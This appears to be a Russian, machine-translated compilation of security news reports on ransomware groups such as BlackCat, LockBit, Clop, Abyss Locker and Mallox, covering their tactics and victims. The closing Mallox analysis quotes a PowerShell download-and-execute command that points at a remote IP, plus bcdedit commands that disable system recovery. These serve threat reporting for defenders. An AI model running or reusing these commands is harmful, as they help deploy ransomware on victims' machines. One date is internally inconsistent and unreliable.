Файлы шифруются с помощью Salsa20, при этом ключ шифрования зашифрован с помощью закрытого ключа RSA в комплекте. Зашифрованные файлы будут иметь расширение из 10 символов, добавленное к имени файла, уникальное для каждой жертвы.
Программа-вымогатель также изменит обои Windows на изображение, сообщающее жертвам, что они могут найти инструкции в заметках о выкупе с именем HOW_TO_RECOVER_FILES.txt.
В Linux файл /etc/motd также заменяется примечанием о выкупе, которое отображается жертвам при входе в систему.
Примечания о выкупе содержат «личный идентификатор», необходимый для входа на платежный сайт Tor злоумышленника и доступа к уникальной странице переговоров жертвы. На этой странице указана сумма выкупа в биткойнах, функция тестовой расшифровки и панель чата для переговоров с злоумышленниками.
https://www.bleepingcomputer.com/news/security/meet-noescape-avaddon-ransomware-gangs-likely-successor/
ALPHV/BlackCat, пытается оказать большее давление на своих жертв, чтобы они заплатили выкуп, предоставляя API для своего сайта утечки, чтобы повысить видимость своих атак.
Этот шаг следует за недавним взломом Estée Lauder, который закончился тем, что косметическая компания полностью проигнорировала попытку злоумышленника вступить в переговоры о выплате выкупа.
Вызовы API и сканер Python
Ранее на этой неделе несколько исследователей заметили, что сайт утечки данных ALPHV/BlackCat добавил новую страницу с инструкциями по использованию их API для сбора своевременных обновлений о новых жертвах.
API или интерфейсы прикладного программирования обычно используются для обеспечения связи между двумя программными компонентами на основе согласованных определений и протоколов.
Исследовательская группа вредоносных программ VX-Underground указала на новый раздел на сайте ALPHV, но похоже, что эта «функция» была частично доступна в течение нескольких месяцев, хотя и не для более широкой аудитории.
ALPHV опубликовала вызовы API, которые помогут получить различную информацию о новых жертвах, добавленных на их сайт утечки, или обновлениях, начиная с определенной даты.
Группа также предоставила сканер, написанный на Python, чтобы помочь получить последнюю информацию о месте утечки данных.
Меньше платящих жертв
Хотя ALPHV не объяснила выпуск API, одной из причин может быть то, что меньше жертв поддаются требованиям программ-вымогателей.
В отчете компании Coveware, занимающейся реагированием на инциденты с программами-вымогателями, отмечается, что во втором квартале этого года количество платящих жертв, пострадавших от атаки программ-вымогателей, «упало до рекордно низкого уровня в 34%».
Тем не менее, некоторые злоумышленники продолжают зарабатывать большие деньги, сосредоточив внимание на цепочке поставок, чтобы взломать большое количество организаций.
Например, программа-вымогатель Clop, по оценкам, заработала не менее 75 миллионов долларов на своей масштабной кампании по краже данных MOVEit.
https://www.bleepingcomputer.com/news/security/alphv-ransomware-adds-data-leak-api-in-new-extortion-strategy/
Clop копирует тактику вымогательства от ALPHV, создавая доступные в Интернете веб-сайты, посвященные конкретным жертвам, упрощая утечку украденных данных и оказывая дополнительное давление на жертв, чтобы они заплатили выкуп.
Когда злоумышленники атакуют корпоративную цель, они сначала крадут данные из сети, а затем шифруют файлы. Эти украденные данные используются в качестве рычага в атаках с двойным вымогательством, предупреждая жертв о том, что данные будут утеряны, если не будет выплачен выкуп.
Места утечки данных программ-вымогателей обычно расположены в сети Tor, поскольку это затрудняет закрытие веб-сайта или правоохранительным органам захват их инфраструктуры.
Однако этот метод хостинга имеет свои проблемы для операторов программ-вымогателей, поскольку для доступа к сайтам требуется специализированный браузер Tor, поисковые системы не индексируют просочившиеся данные, а скорость загрузки обычно очень низкая.
Чтобы преодолеть эти препятствия, в прошлом году операция по вымогательству ALPHV, также известная как BlackCat, представила новую тактику вымогательства, заключающуюся в создании веб-сайтов для утечки украденных данных, которые рекламировались как способ для сотрудников проверить, не произошла ли утечка их данных.
Веб-сайт clearweb размещается непосредственно в Интернете, а не в анонимных сетях, таких как Tor, для доступа к которым требуется специальное программное обеспечение.
Этот новый метод упрощает доступ к данным и, вероятно, приведет к их индексации поисковыми системами, что еще больше расширит распространение утекшей информации.
Пустая трата времени?
Эти сайты нацелены на то, чтобы напугать сотрудников, руководителей и деловых партнеров, которые могли быть затронуты украденными данными, надеясь, что это заставит их оказать дополнительное давление на компанию, чтобы она заплатила выкуп.
Однако, несмотря на то, что такая утечка данных может иметь некоторые преимущества, она также сопряжена со своими проблемами, поскольку их размещение в Интернете, а не через Tor, значительно упрощает их удаление.
В настоящее время все известные сайты-вымогатели Clop clearweb отключены.
Неясно, были ли эти сайты недоступны из-за конфискации правоохранительными органами, DDoS-атак со стороны фирм, занимающихся кибербезопасностью, или закрытия сайтов хостинг-провайдерами и регистраторами.
https://www.bleepingcomputer.com/news/security/clop-now-leaks-data-stolen-in-moveit-attacks-on-clearweb-sites/
Abyss Locker является последней разработкой шифровальщика Linux для атак на платформу виртуальных машин VMware ESXi при атаках на предприятие.
По мере того, как предприятие переходит от отдельных серверов к виртуальным машинам для лучшего управления ресурсами, производительности и аварийного восстановления, злоумышленники создают шифраторы, нацеленные на платформу.
Поскольку VMware ESXi является одной из самых популярных платформ виртуальных машин, почти каждая кибергруппа начала выпускать шифраторы Linux для шифрования всех виртуальных серверов на устройстве.
Другие операции с программами-вымогателями, использующие шифровальщики программ-вымогателей Linux, в основном нацеленные на VMware ESXi, включают Akira, Royal, Black Basta, LockBit, BlackMatter, AvosLocker, REvil, HelloKitty, RansomEXX и Hive.
Abyss Locker — это относительно новая операция по вымогательству, которая, как считается, была запущена в марте 2023 года, когда она начала атаковать компании.
Как и другие операции с программами-вымогателями, злоумышленники Abyss Locker взламывают корпоративные сети, похищают данные для двойного вымогательства и шифруют устройства в сети.
Украденные данные затем используются в качестве рычага, угрожая утечкой файлов, если выкуп не будет выплачен. Для утечки украденных файлов злоумышленники создали сайт утечки данных Tor под названием «Abyss-data», на котором в настоящее время перечислены четырнадцать жертв.
Злоумышленники утверждают, что украли от 35 ГБ данных у одной компании до 700 ГБ у другой.
Ориентация на серверы VMware ESXi
На этой неделе исследователь безопасности MalwareHunterTeam обнаружил ELF-шифровальщик Linux для операции Abyss Locker и поделился им с BleepingComputer для анализа.
После просмотра строк в исполняемом файле становится ясно, что шифровальщик специально нацелен на серверы VMware ESXi.
Как видно из приведенных ниже команд, шифровальщик использует инструмент управления VMware ESXi из командной строки esxcli, чтобы сначала составить список всех доступных виртуальных машин, а затем завершить их работу.
Шифровальщик завершает работу всех виртуальных машин, чтобы обеспечить правильное шифрование связанных виртуальных дисков, моментальных снимков и метаданных путем шифрования всех файлов со следующими расширениями: .vmdk (виртуальные диски), .vmsd (метаданные) и .vmsn (моментальные снимки).
В дополнение к нацеливанию на виртуальные машины программа-вымогатель также будет шифровать все другие файлы на устройстве и добавлять расширение .crypt к их именам.
Для каждого файла шифровальщик также создаст файл с расширением .README_TO_RESTORE, который действует как примечание о выкупе.
Эта записка о выкупе содержит информацию о том, что случилось с файлами, и уникальную ссылку на сайт переговоров Tor злоумышленника. Этот сайт очень прост, имеет только панель чата, которую можно использовать для переговоров с бандой вымогателей.
Эксперт по программам-вымогателям Майкл Гиллеспи сказал, что шифровальщик Abyss Locker Linux основан на Hello Kitty, но вместо этого использует шифрование ChaCha.
https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/
Microsoft обнаружила новую версию программы-вымогателя BlackCat, которая включает в себя сетевую структуру Impacket и хакерский инструмент Remcom, которые позволяют распространяться по взломанной сети.
В апреле исследователь кибербезопасности VX-Underground написал в Твиттере о новой версии шифровальщика BlackCat/ALPHV под названием Sphynx.
«Рады сообщить вам, что тестирование основных возможностей ALPHV/BlackCat 2.0: Sphynx завершено», — сообщили операторы BlackCat в сообщении своим аффилиатам.
«Код, включая шифрование, был полностью переписан с нуля. По умолчанию все файлы заморожены. Основным приоритетом этого обновления была оптимизация обнаружения с помощью AV/EDR», — далее объясняются операции вымогателя.
Вскоре после этого IBM Security X-Force подробно изучила новый шифровальщик BlackCat, предупредив, что шифровальщик превратился в набор инструментов.
Это было основано на строках в исполняемом файле, которые указывали, что он содержит impacket, используемый для постэксплуатационных функций, таких как удаленное выполнение и сброс секретов из процессов.
Шифровальщик BlackCat Sphynx
Microsoft Threat Intelligence сообщила, что они также проанализировали новую версию Sphynx и обнаружили, что она использует инфраструктуру Impacket для бокового распространения в скомпрометированных сетях.
«Microsoft обнаружила, что в недавних кампаниях использовалась новая версия программы-вымогателя BlackCat», — сообщила Microsoft.
«Эта версия включает инструмент инфраструктуры связи с открытым исходным кодом Impacket, который злоумышленники используют для облегчения бокового перемещения в целевой среде».
Impacket описывается как коллекция классов Python с открытым исходным кодом для работы с сетевыми протоколами.
Тем не менее, он чаще используется тестировщиками проникновения, красными командами и злоумышленниками в качестве набора инструментов после эксплуатации для бокового распространения в сети, вывода учетных данных из процессов, выполнения ретрансляционных атак NTLM и многого другого.
Impacket стал очень популярным среди злоумышленников, которые взламывают устройство в сети, а затем используют инфраструктуру для получения повышенных учетных данных и доступа к другим устройствам.
Согласно Microsoft, операция BlackCat использует инфраструктуру Impacket для дублирования учетных данных и удаленного запуска службы для развертывания шифровальщика по всей сети.
Microsoft сообщает, что помимо Impacket в шифратор встроен хакерский инструмент Remcom, который представляет собой небольшую удаленную оболочку, позволяющую шифровальщику удаленно выполнять команды на других устройствах в сети.
В частном информационном бюллетене Microsoft 365 Defender Threat Analytics, с которым ознакомился BleepingComputer, Microsoft сообщает, что они видели это новое шифрование, используемое дочерней компанией BlackCat «Storm-0875» с июля 2023 года.
Microsoft идентифицирует эту новую версию как BlackCat 3.0, хотя, как мы уже говорили, операция по вымогательству называет ее «Sphynx» или «BlackCat/ALPHV 2.0» в общении с аффилированными лицами.
BlackCat, также известная как ALPHV, начала свою работу в ноябре 2021 года и, как полагают, является ребрендингом DarkSide/BlackMatter.
Эта группа всегда считалась одной из самых передовых и высококлассных операций постоянно совершенствует свою деятельность с помощью новых тактик.
Например, прошлым летом в качестве новой тактики вымогательства группа создала веб-сайт, посвященный утечке данных для конкретной жертвы, чтобы клиенты и сотрудники могли проверить, не раскрыты ли их данные.
Совсем недавно злоумышленники создали API утечки данных, упрощающий распространение украденных данных.
Благодаря тому, что шифровальщик BlackCat превратился из дешифратора в полноценный набор инструментов для пост-эксплуатации, он позволяет аффилированным лицам-вымогателям быстрее развертывать шифрование файлов в сети.
Поскольку очень важно обнаруживать атаки программ-вымогателей, как только они происходят, добавление этих инструментов только усложняет задачу для защитников.
https://www.bleepingcomputer.com/news/microsoft/microsoft-blackcats-sphynx-ransomware-embeds-impacket-remcom/
Национальная полиция Испании предупреждает о продолжающейся кампании по вымогательству LockBit Locker, нацеленной на архитектурные компании в стране посредством фишинговых электронных писем.
"Зафиксирована волна рассылки электронных писем архитектурным компаниям, хотя не исключено, что они распространят свою деятельность и на другие отрасли", - говорится в переведенном на машине сообщении полиции.
«Обнаруженная кампания имеет очень высокий уровень сложности, поскольку жертвы ничего не подозревают, пока не подвергнутся шифрованию терминалов».
Киберполиция Испании обнаружила, что многие электронные письма отправляются с несуществующего домена «fotoprix.eu» и выдают себя за фотофирму.
Злоумышленники выдают себя за недавно открывшийся фотомагазин и запрашивают у архитектурной фирмы план реконструкции/развития объекта и смету на работы.
После обмена несколькими электронными письмами для укрепления доверия операторы LockBit предлагают назначить дату встречи для обсуждения бюджета и деталей строительного проекта и отправить архив с документами с точными спецификациями ремонта.
Хотя испанский вариант не содержит особых технических подробностей, в образце, этот архив представляет собой файл образа диска (.img), который при открытии в более новых версиях Windows автоматически монтирует файл как букву диска и отображает его содержание.
Эти архивы содержат папку с именем «fotoprix», содержащую множество файлов Python, пакетных файлов и исполняемых файлов. Архив также содержит ярлык Windows с именем «Caracteristicas», который при запуске запускает вредоносный скрипт Python.
Анализ BleepingComputer показывает, что выполняемый скрипт Python проверит, является ли пользователь администратором устройства, и если да, то внесет изменения в систему для обеспечения устойчивости, а затем запустит программу-вымогатель LockBit Locker для шифрования файлов.
Если пользователь Windows не является администратором на устройстве, он будет использовать обход Fodhelper UAC для запуска шифровальщика-вымогателя с правами администратора.
BleepingComputer полагает, что эта кампания проводится различными злоумышленниками, использующими утекший в сеть сборщик программ-вымогателей LockBit 3.0.
Обычная операция LockBit осуществляет переговоры через сайт переговоров Tor, в то время как этот «LockBit Locker» ведет переговоры по электронной почте «[email protected]» или через платформу обмена сообщениями Tox.
Кроме того, автоматический анализ с помощью сканирующего механизма Intezer идентифицирует исполняемый файл программы-вымогателя как BlackMatter, которая была прекращена в 2021 году и позже переименована в ALPHV/BlackCat.
Однако это ожидаемо, поскольку просочившийся сборщик LockBit 3.0, также известный как LockBit Black, также идентифицируется Intezer как BlackMatter из-за использования исходного кода BlackMatter.
Учитывая изощренность фишинговых писем и социальной инженерии, вполне вероятно, что злоумышленники, стоящие за этой кампанией, используют различные приманки для компаний из других секторов.
Субъекты фишинга широко использовали приманку «призыв к участию в торгах» в кампаниях, выдавая себя за частные фирмы или государственные учреждения и используя хорошо составленные документы, чтобы убедить в легитимности своих сообщений.
https://www.bleepingcomputer.com/news/security/spain-warns-of-lockbit-locker-ransomware-phishing-attacks/
BlackCat (ALPHV) теперь использует украденные учетные записи Microsoft и недавно обнаруженный шифратор Sphynx для шифрования облачного хранилища Azure.
В ходе расследования недавнего взлома сотрудники службы реагирования на инциденты Sophos X-Ops обнаружили, что злоумышленники использовали новый вариант Sphynx с дополнительной поддержкой использования пользовательских учетных данных.
Получив доступ к учетной записи Sophos Central с помощью украденного одноразового пароля (OTP), они отключили защиту от несанкционированного доступа и изменили политику безопасности. Впоследствии они зашифровали системы клиента Sophos и удаленное облачное хранилище Azure, а также добавили расширение .zk09cvt ко всем заблокированным файлам. В общей сложности операторам программ-вымогателей удалось успешно зашифровать 39 учетных записей хранилища Azure.
Они проникли на портал Azure жертвы, используя украденный ключ Azure, который предоставил им доступ к целевым учетным записям хранения. Ключи, использованные в атаке, были внедрены в двоичный файл программы-вымогателя после кодирования с использованием Base64.
Во время взлома злоумышленники также использовали несколько инструментов удаленного мониторинга и управления (RMM), таких как AnyDesk, Splashtop и Atera.
Sophos обнаружила вариант Spynx в марте 2023 года во время расследования утечки данных, которая имела сходство с другой атакой, описанной в отчете IBM-Xforce, опубликованном в мае (в обоих случаях для извлечения украденных данных использовался инструмент ExMatter).
В прошлом месяце Microsoft также обнаружила, что новый шифратор Sphynx включает в себя хакерский инструмент Remcom и сетевую структуру Impacket для горизонтального перемещения по взломанным сетям.
BlackCat/ALPHV — программа-вымогатель, появившаяся в ноябре 2021 года. Предполагается, что это ребрендинг DarkSide/BlackMatter.
На этой неделе одна из дочерних групп(отслеживаемая как Scattered Spider) заявила об атаке на MGM Resorts, заявив, что они зашифровали более 100 гипервизоров ESXi после того, как компания отключила свою внутреннюю инфраструктуру и отказалась вести переговоры о выплате выкупа.
https://www.bleepingcomputer.com/news/security/blackcat-ransomware-hits-azure-storage-with-sphynx-encryptor/
Доступные в Интернете серверы WS_FTP, на которых не установлены патчи, закрывающие уязвимость максимальной серьезности, теперь подвергаются атакам программ-вымогателей.
Как недавно заметили специалисты по реагированию на инциденты Sophos X-Ops, злоумышленники, назвавшие себя киберпреступной группой Reichsadler, безуспешно попытались развернуть полезные нагрузки программ-вымогателей, созданные с помощью сборщика LockBit 3.0, украденного в сентябре 2022 года.
Злоумышленники попытались повысить привилегии с помощью инструмента GodPotato с открытым исходным кодом, который позволяет повысить привилегии до «NT AUTHORITY\SYSTEM» на клиентских (от Windows 8 до Windows 11) и серверных (от Windows Server 2012 до Windows Server 2022) платформах Windows.
К счастью, их попытка развернуть полезные нагрузки программы-вымогателя в системах жертвы была пресечена, что не позволило злоумышленникам зашифровать данные цели.
Уязвимость, отслеживаемая как CVE-2023-40044, вызвана уязвимостью десериализации .NET в модуле Ad Hoc Transfer, позволяющей неаутентифицированным злоумышленникам удаленно выполнять команды в базовой ОС через HTTP-запросы.
27 сентября Progress Software выпустила обновления безопасности для устранения критической уязвимости сервера WS_FTP, призывая администраторов обновить уязвимые экземпляры.
«Мы рекомендуем выполнить обновление до самой последней версии — 8.8.2. Обновление до исправленной версии с использованием полного установщика — единственный способ решить эту проблему», — сказал Прогресс.
Исследователи безопасности Assetnote, обнаружившие ошибку WS_FTP, выпустили код эксплойта для проверки концепции (PoC) всего через несколько дней после того, как она была исправлена.
Компания по кибербезопасности Rapid7 сообщила, что злоумышленники начали использовать CVE-2023-40044 3 сентября, в день, когда был выпущен эксплойт PoC.
«Цепочка выполнения процессов выглядит одинаково во всех наблюдаемых экземплярах, что указывает на возможную массовую эксплуатацию уязвимых серверов WS_FTP», — предупредил Rapid7.
Shodan перечисляет почти 2000 подключенных к Интернету устройств, на которых установлено программное обеспечение WS_FTP Server, что подтверждает первоначальные оценки Assetnote.
Организации, которые не могут немедленно исправить свои серверы, могут блокировать входящие атаки, отключив уязвимый модуль специальной передачи сервера WS_FTP.
https://www.bleepingcomputer.com/news/security/ransomware-attacks-now-target-unpatched-ws-ftp-servers/
Появился новый бренд, предлагающий программы-вымогатели как услугу, под названием Hunters International, использующий код Hive Ramsonware, что позволяет предположить, что прежняя группа возобновила деятельность под другим флагом.
Эта теория подтверждается анализом нового шифровальщика, выявившим множественное дублирование кода.
Исследователи безопасности, проанализировав образец вредоносного ПО Hunters International, обнаружили поразительное сходство с кодом, использованным в атаках программ-вымогателей Hive.
В частности, аналитик вредоносного ПО и реверс-инженер rivitna, который первым заметил новый шифратор, пришел к выводу, что вредоносное ПО Hunters International представляет собой образец программы-вымогателя Hive версии 6.
Исследователь безопасности Уилл Томас рассказал, что он обнаружил «некоторые поддерживаемые строки программы-вымогателя Hive» в коде Hunters International.
Присмотревшись к выборке Hunters International, исследователь обнаружил совпадения и сходства кода, которые соответствуют более чем 60% кода программы-вымогателя Hive.
Однако группа Hunters International опровергает «обвинения» исследователей, утверждая, что это новый сервис на рынке программ-вымогателей, который приобрел исходный код шифровальщика у разработчиков Hive.
Hive International утверждает, что код Hive содержал «множество ошибок, которые в некоторых случаях приводили к недоступности для расшифровки», но они это исправили.
На данный момент остается неизвестным, продала ли Hive исходный код другим кибергруппам или нет, но деятельность Hive внезапно остановилась после того, как ее сайт платежей Tor и сайт утечки данных был захвачен в ходе международной операции в январе 2023г.
https://www.bleepingcomputer.com/news/security/new-hunters-international-ransomware-possible-rebrand-of-hive/
BlackCat (ALPHV) утверждает, что взломала сеть гиганта здравоохранения Генри Шейна и украла десятки терабайт данных, включая данные о заработной плате и информацию об акционерах.
Генри Шейн — поставщик решений в области здравоохранения и компания из списка Fortune 500 с операциями и филиалами в 32 странах и доходом более 12 миллиардов долларов в 2022 году.
15 октября компания сообщила, что ей пришлось отключить некоторые системы, чтобы сдержать кибератаку, которая затронула ее производственный и дистрибьюторский бизнес днем ранее.
Хотя некоторые из ее бизнес-операций были прерваны, компания заявляет, что это не повлияло на ее программное обеспечение для управления практикой Генри Шейна One.
Генри Шейн уведомил соответствующие правоохранительные органы об инциденте и с тех пор нанял внешних экспертов по кибербезопасности и криминалистике для расследования потенциальной утечки данных, возникшей в результате атаки.
В письме, опубликованном через неделю после раскрытия информации о кибератаке, поставщик медицинских услуг призвал клиентов размещать заказы через своего представителя Генри Шейна или использовать специальные телефонные номера для продаж по телефону.
Почти две недели спустя BlackCat/ALPHV добавила Генри Шейна на свой сайт утечки информации в темной сети, заявив, что они взломали сеть компании и украли 35 ТБ конфиденциальных файлов.
BlackCat/ALPHV утверждает, что они снова зашифровали устройства компании как раз в тот момент, когда Генри Шейн почти завершил восстановление всех ее систем, поскольку текущие переговоры провалились.
«Несмотря на продолжающиеся обсуждения с командой Генри, мы не получили никаких признаков их готовности уделять приоритетное внимание безопасности своих клиентов, партнеров и сотрудников, не говоря уже о защите собственной сети», — заявили злоумышленники.
«Сегодня в полночь часть их внутренних данных о заработной плате и папок акционеров будет опубликована в нашем блоге о сборах. Мы продолжим публиковать больше данных ежедневно».
Запись Генри Шейна на сайте утечки данных BlackCat с тех пор была удалена, что намекало на то, что компания возобновит переговоры или выплатит выкуп.
О BlackCat стало известно в ноябре 2021 года. Предполагается, что она является ребрендингом пресловутой группы DarkSide/BlackMatter.
https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-breach-of-healthcare-giant-henry-schein/
Аэрокосмический гигант Boeing расследует кибератаку, которая повлияла на его бизнес по производству запчастей и дистрибуции после того, как LockBit заявила, что они взломали сеть компании и украли данные.
В Boeing заявили, что инцидент не повлиял на безопасность полетов, и подтвердили сотрудничество с правоохранительными и регулирующими органами в рамках текущего расследования.
Сервисный веб-сайт Boeing в настоящее время недоступен из-за сообщения о том, что продолжающееся отключение вызвано «техническими проблемами».
LockBit заявила, что они якобы взломали сеть Boeing и украли значительный объем конфиденциальной информации, которую через пять дней они опубликуют в Интернете, если производитель самолетов не свяжется с вами до истечения установленного срока.
Хотя компания Boeing еще не подтвердила связь между заявлениями LockBit и инцидентом, который затронул некоторые из ее систем, страница утечки данных на dark веб-сайте теперь удалена.
«Огромное количество конфиденциальных данных было извлечено и готово к публикации, если Boeing не свяжется с нами в установленные сроки», — говорилось в сообщении перед удалением.
«На данный момент мы не будем отправлять списки или образцы, чтобы защитить компанию, НО мы не будем хранить их до истечения крайнего срока».
Обычно это происходит, когда жертвы либо начинают вести переговоры о выкупе с бандой вымогателей, либо если они уже заплатили за прекращение публикации украденных файлов в Интернете и за получение инструмента расшифровки.
https://www.bleepingcomputer.com/news/security/boeing-confirms-cyberattack-amid-lockbit-ransomware-claims/
Атаки программ-вымогателей Lockbit используют общедоступные эксплойты уязвимости Citrix Bleed (CVE-2023-4966) для взлома систем крупных организаций, кражи данных и шифрования файлов.
Хотя Citrix выпустила исправления для CVE-2023-4966 более месяца назад, на тысячах конечных точек, доступных в Интернете, все еще используются уязвимые устройства, многие из которых находятся в США.
Громкие атаки на Lockbit
Исследователь угроз Кевин Бомонт отслеживал атаки на различные компании, в том числе на Промышленный и коммерческий банк Китая (ICBC), DP World, Allen & Overy и Boeing, и обнаружил, что у них есть что-то общее.
Это открытые серверы Citrix [1, 2], уязвимые для уязвимости Citrix Bleed, которую, по его словам, использует LockBit.
Это было дополнительно подтверждено газетой Wall Street Journal, которая получила электронное письмо от Министерства финансов США, отправленное некоторым поставщикам финансовых услуг, в котором упоминалось, что LockBit несет ответственность за кибератаку на ICBC, которая была достигнута путем использования уязвимости Citrix Bleed.
Если LockBit использовал уязвимость для взлома одной компании, считается, что они, вероятно, аналогичным образом взломали Boeing и DP World.
Эти атаки, вероятно, проводятся филиалом LockBit, который активно использует эту уязвимость для взлома сетей.
Поскольку LockBit является крупнейшей программой-вымогателем как услугой, она использует множество партнеров, которые имеют полную свободу действий в отношении взлома сетей.
Как мы видели на примере партнера, который участвовал как в GandCrab, так и в REvil, хакеры нередко сосредотачиваются на одной конкретной отрасли или методе первоначального доступа.
Например, филиал GandCrab/REvil специализируется на использовании программного обеспечения MSP [1, 2, 3] для шифрования компаний, и мы, вероятно, видим филиал LockBit, использующий уязвимость Citrix Bleed для массового взлома сетей.
Массивная поверхность атаки
По данным японского исследователя угроз Ютаки Седжиямы, на момент написания более 10 400 серверов Citrix уязвимы для CVE-2023-4966.
Сканирование Седжиямы выявило уязвимые серверы в крупных и критически важных организациях в вышеупомянутых и многих других странах, причем все они остаются неисправленными в течение целого месяца после публичного раскрытия критической уязвимости.
Подробнее о Citrix Bleed
Citrix Bleed был объявлен 10 октября как критическая проблема безопасности, которая затрагивает ADC и шлюз Citrix NetScaler, обеспечивая доступ к конфиденциальной информации об устройствах.
Компания Mandiant сообщила, что злоумышленники начали использовать Citrix Bleed в конце августа, когда брешь в системе безопасности еще существовала. В ходе атак хакеры использовали HTTP-запросы GET для получения файлов cookie сеанса Netscaler AAA после этапа многофакторной аутентификации (MFA).
Citrix призвала администраторов защищать системы от таких несложных атак без взаимодействия. 25 октября компания AssetNote, занимающаяся управлением внешними поверхностями атак, выпустила экспериментальный эксплойт, демонстрирующий, как можно украсть токены сеанса.
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-exploits-citrix-bleed-in-attacks-10k-servers-exposed/
Ранее сегодня злоумышленник включил в список утечки данных компанию-разработчика программного обеспечения MeridianLink, пригрозив, что она сольет якобы украденные данные, если в течение 24 часов не будет выплачен выкуп.
MeridianLink — это публичная компания, которая предоставляет цифровые решения для финансовых организаций, таких как банки, кредитные союзы и ипотечные кредиторы.
Хакеры донесли на SEC
По данным DataBreaches.net, ALPHV заявила, что 7 ноября они взломали сеть MeridianLink и украли данные компании без использования систем шифрования.
Участник программы-вымогателя сказал, что «похоже, что MeridianLink связалась с нами, но мы еще не получили сообщения с их стороны», чтобы договориться о выплате в обмен на неразглашение предположительно украденных данных.
Предполагаемое отсутствие ответа со стороны компании, вероятно, побудило хакеров оказать большее давление, отправив жалобу в Комиссию по ценным бумагам и биржам США (SEC) на то, что MeridianLink не раскрыла инцидент кибербезопасности, который повлиял на «данные клиентов и операционную информацию».
Чтобы показать, что их жалоба реальна, ALPHV опубликовала на своем сайте скриншот формы, которую они заполнили на странице «Советы, жалобы и рекомендации» SEC.
По их собственным словам, злоумышленник сообщил SEC, что компания MeridianLink подверглась «существенному нарушению» и не раскрыла это, как того требует форма 8-К согласно пункту 1.05.
После шквала инцидентов безопасности в организациях США SEC приняла новые правила, которые требуют от публичных компаний сообщать о кибератаках, которые оказывают существенное влияние, т.е. влияют на инвестиционные решения.
Отчеты об инцидентах кибербезопасности «сдаются через четыре рабочих дня после того, как владелец регистрации определит, что инцидент кибербезопасности является существенным», говорится в новом правиле.
Однако новые правила кибербезопасности SEC должны вступить в силу 15 декабря 2023 года, пояснило агентство Reuters в начале октября.
MeridianLink подтверждает кибератаку
В заявлении компания MeridianLink сообщила, что после выявления инцидента компания немедленно приняла меры по сдерживанию угрозы и привлекла к расследованию группу сторонних экспертов.
Компания добавила, что она все еще работает над тем, чтобы определить, была ли кибератака затронула какую-либо личную информацию потребителей, и если это так, она уведомит пострадавшие стороны.
Хотя многие группы, занимающиеся программами-вымогателями и вымогателями, угрожают сообщить в SEC о нарушениях и краже данных, это может быть первым публичным подтверждением того, что они это сделали.
https://www.bleepingcomputer.com/news/security/ransomware-gang-files-sec-complaint-over-victims-undisclosed-breach/
Ситуация с программами-вымогателями характеризуется сильным оттоком как групп участников, так и семейств вредоносных программ, и лишь немногие игроки демонстрируют относительное долголетие. Когда-то внушавшие страх угрозы, такие как REvil и Conti, были либо демонтированы, либо распущены, в то время как другие – например, ALPHV, Black Basta и LockBit – продолжают безнаказанно вымогать деньги у компаний. Ко второму списку мы также можем добавить Mallox (также известный как TargetCompany), менее известную, но давно существующую угрозу-вымогателя, впервые замеченную в 2021 году. Сегодня группа продолжает воровать и сливать постоянный поток корпоративных данных.
В этом посте мы освещаем недавнюю активность Mallox, объясняем первоначальные методы доступа группы и предоставляем высокоуровневый анализ недавних полезных нагрузок Mallox, чтобы помочь защитникам лучше понять и защититься от этой постоянной угрозы.
Работая по модели «Программы-вымогатели как услуга» (RaaS), Mallox использует известные подпольные форумы и рынки, такие как Nulled и RAMP, для рекламы своих услуг и набора партнеров. Группа поддерживает сайт утечек на базе TOR, где регулярно объявляет о недавно скомпрометированных организациях и раскрывает украденные данные. Маллокс также присутствует в Twitter/X для аналогичных целей.
Mallox в первую очередь получает первоначальный доступ за счет использования уязвимых и общедоступных сервисов, уделяя особое внимание интерфейсам MS-SQL (Microsoft SQL Server) и ODBC (Open Database Connectivity). Целью являются конкретные уязвимости, в том числе неисправленные экземпляры старых уязвимостей удаленного выполнения кода (RCE), таких как CVE-2019-1068 в Microsoft SQL Server и CVE-2020-0618 в Microsoft SQL Server Reporting Services.
Кроме того, группа успешно использует атаки методом перебора против слабо настроенных сервисов и приложений, открытых для общего доступа в Интернет. В ходе недавних кампаний участники Mallox получили первоначальный доступ посредством перебора на основе словаря против слабых интерфейсов MS-SQL. Однако известно, что филиалы Mallox используют и другие векторы, в том числе фишинговые электронные письма для доставки инфраструктур атак, таких как Cobalt Strike и Sliver.
После получения первоначального доступа злоумышленники Mallox обычно выполняют команды PowerShell для запуска различных пакетных сценариев и загрузки полезных данных программы-вымогателя. Такие сценарии, как Kill-Delete.bat или Bwmeldokiller.bat, используются для завершения или удаления запущенных процессов, которые могут помешать или помешать процедуре шифрования программы-вымогателя.
Команды выполняются для загрузки и запуска полезных нагрузок программы-вымогателя. Ниже приведен типичный пример:
/C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile("hXXp://80[.]66.75]]]].40/XXXXXXXXX.exe", "%TEMP%\xxxx.exe") >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy Bypass %TEMP%\updt.ps1 & WMIC process call create "%TEMP%\XXXXXXXX.exe"Последовательность команд сначала создает сценарий PowerShell во временном каталоге системы, используя класс WebClient для загрузки исполняемого файла с удаленного сервера. Сценарий PowerShell updt.ps1 выполняется с обходом ограничений политики выполнения, что обеспечивает неограниченный запуск. Затем сценарий использует инструментарий управления Windows (WMIC) для выполнения полезной нагрузки программы-вымогателя.
Варианты Mallox с 2021 года по сегодняшний день демонстрируют весьма согласованный набор основных функций, что указывает на то, что злоумышленники продолжают добиваться успеха с помощью проверенной и проверенной формулы. Последние полезные данные помечены как «Mallox.Resurrection», что отражает изменение в заметках о выкупе, внесенных после шифрования.
Жестко запрограммированные исключения освобождают ряд типов файлов и процессов от шифрования. Типы файлов исключаются через именованные расширения:
Процессы исключаются или игнорируются на основании наличия определенных строк в имени пути
При запуске программа-вымогатель запускает следующие команды:
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures bcdedit.exe /set {current} recoveryenabled noОни служат для изменения настроек данных конфигурации загрузки (BCD), влияя на способность ОС восстанавливаться после сбоя и не позволяя администраторам восстановить систему с помощью встроенных инструментов Windows.
